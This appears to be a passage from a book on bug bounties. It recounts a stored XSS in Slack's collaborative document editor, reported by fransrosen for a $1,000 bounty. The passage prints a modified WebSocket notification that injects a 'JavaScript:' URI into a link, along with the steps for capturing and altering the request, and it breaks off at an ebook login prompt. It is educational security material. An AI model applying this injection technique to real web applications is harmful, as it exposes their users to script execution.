Slack XSS

  • Title: Stored XSS on team.slack.com using the new Markdown editor of posts inside the editing mode and using JavaScript URIs.
  • Reported by: fransrosen.
  • Bounty rewarded: $1,000.
  • Web application URL: https://slack.com.
  • Description: Slack is an online team collaboration platform that can be used to manage projects internally and externally. It is used by many organizations to collaborate on different projects. Slack provides a live document-editing feature for text documents, which can be used to edit documents in collaboration in real time. This XSS vulnerability was identified by Fransrosen in Slack's real-time document-editing feature.
  • When a document is uploaded on Slack, it is transferred to the /files/ directory. That particular directory, followed by the encoded filename, was used to execute arbitrary code in editing mode. The vulnerability relies on catching modifications from the WebSocket and triggering the XSS attack there on the end.
  • The vulnerability, however, is triggered when the malicious JavaScript is embedded as a notification behind the text in editing mode. Frans used the following URL as a test: https://marqueexss.slack.com/files/marqueexss/F0283AA4K
  • Consider the following piece of text:

This payload listed as javascript;alert("XSS") is the vulnerable code with a link embedded behind it. However, the JS alert cannot be executed by embedding the JS payload directly, so the payload has to be stored in the WebSocket notifications. The payload looks something like the following, which is a notification:

{"type":"rocket","event":"rocket","payload":{"mm":[["fi",[],3,{"type":"unfurl","originalFragment":{"_bindings":{"attach":[[]],"mutation:post":[[]],"attached":[[]],"detach":[[]],"detached":[[]]},"_bindingLock":0,"_customData":[],"_data":{"type":"p","text":"JavaScript:alert(document.domain%29","tabbing":0,"links":{"JavaScript:alert("XSS"%29":[0,22]},"formats":[]},"_dom":null,"_mutable":{"_lock":0},"_mutableGuard":{"_lock":0},"_parent":null,"_text":"JavaScript:alert("XSS"%29","_tabbing":0,"_links":{"JavaScript:alert("XSS"":{"_ranges":[{"_s":0,"_e":22}]}},"pendingUnfurls":[],"_formats":{"b":{"_ranges":[]},"i":{"_ranges":[]},"u":{"_ranges":[]},"strike":{"_ranges":[]},"code":{"_ranges":[]}}},"url":"JavaScript:alert("XSS"%29"}]],"r":19,"$":15,"type":"mm","sel":[[3],0,[3],0]},"id":25}

The previous payload is basically a WebSocket notification being sent to the web application. The parameters are present in the text string, and almost all of them have been provided with a conventional XSS alert payload, which, upon reversing to the web application, will generate an alert box upon the user clicking the link:

Since more than one team members can edit one document, many users can be infected by this vulnerability as well. So, Frans basically carried out the following steps to execute the vulnerability:

  1. Delete the link behind the text that was embedded
  2. Press Ctrl + Z to undo it
  3. Put back the link
  4. Capture that request
  5. Modify the request to insert the payload inside the links part of the WebSocket request
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.224.69.169